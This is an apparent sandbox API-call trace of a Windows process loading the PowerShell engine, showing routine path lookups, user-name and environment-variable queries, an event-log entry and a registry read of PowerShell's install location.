	[0417.566] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd030 | out: lpFileInformation=0xcd030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0417.566] SetErrorMode (uMode=0x1) returned 0x1
	[0417.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.566] SetErrorMode (uMode=0x1) returned 0x1
	[0417.566] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd030 | out: lpFileInformation=0xcd030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0417.566] SetErrorMode (uMode=0x1) returned 0x1
	[0417.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0xccd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.567] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xcce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0417.567] SetErrorMode (uMode=0x1) returned 0x1
	[0417.567] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xcd070 | out: lpFileInformation=0xcd070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0417.567] SetErrorMode (uMode=0x1) returned 0x1
	[0417.567] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xcce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0417.567] SetErrorMode (uMode=0x1) returned 0x1
	[0417.567] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xcd070 | out: lpFileInformation=0xcd070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0417.568] SetErrorMode (uMode=0x1) returned 0x1
	[0417.568] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xcce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0417.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0xccd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0417.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.568] SetErrorMode (uMode=0x1) returned 0x1
	[0417.568] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd070 | out: lpFileInformation=0xcd070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0417.882] SetErrorMode (uMode=0x1) returned 0x1
	[0417.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.882] SetErrorMode (uMode=0x1) returned 0x1
	[0417.882] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd070 | out: lpFileInformation=0xcd070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0417.882] SetErrorMode (uMode=0x1) returned 0x1
	[0417.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0xccd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0417.885] SetErrorMode (uMode=0x1) returned 0x1
	[0417.885] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd330 | out: lpFileInformation=0xcd330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0417.885] SetErrorMode (uMode=0x1) returned 0x1
	[0417.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0417.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0417.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0417.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.293] CoTaskMemAlloc (cb=0x804) returned 0x1b784da0
	[0418.293] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b784da0, nSize=0xcd698 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd698) returned 0x1
	[0418.294] CoTaskMemFree (pv=0x1b784da0) 
	[0418.294] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0418.294] GetUserNameW (in: lpBuffer=0x194120, pcbBuffer=0xcd6d8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd6d8) returned 1
	[0418.294] CoTaskMemFree (pv=0x194120) 
	[0418.295] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e511a0*="Available", lpRawData=0x2e50f30) returned 1
	[0418.556] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0418.556] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0418.556] CoTaskMemFree (pv=0x1ed820) 
	[0418.558] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0418.558] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0418.558] CoTaskMemFree (pv=0x1ed820) 
	[0418.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.565] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0418.565] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0418.565] CoTaskMemFree (pv=0x1ed820) 
	[0418.565] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0418.565] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0418.565] CoTaskMemFree (pv=0x1ed820) 
	[0418.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.568] GetCurrentProcessId () returned 0x534
	[0418.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.573] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd6b8 | out: phkResult=0xcd6b8*=0x364) returned 0x0
	[0418.573] RegQueryValueExW (in: hKey=0x364, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd63c, lpData=0x0, lpcbData=0xcd638*=0x0 | out: lpType=0xcd63c*=0x1, lpData=0x0, lpcbData=0xcd638*=0x56) returned 0x0
	[0418.573] CoTaskMemAlloc (cb=0x5a) returned 0x1b772ad0
	[0418.573] RegQueryValueExW (in: hKey=0x364, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd60c, lpData=0x1b772ad0, lpcbData=0xcd608*=0x56 | out: lpType=0xcd60c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd608*=0x56) returned 0x0
	[0418.573] CoTaskMemFree (pv=0x1b772ad0) 
	[0418.573] RegCloseKey (hKey=0x364) returned 0x0
	[0418.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.576] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0418.577] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0418.577] CoTaskMemFree (pv=0x1ed820) 
	[0418.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0418.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
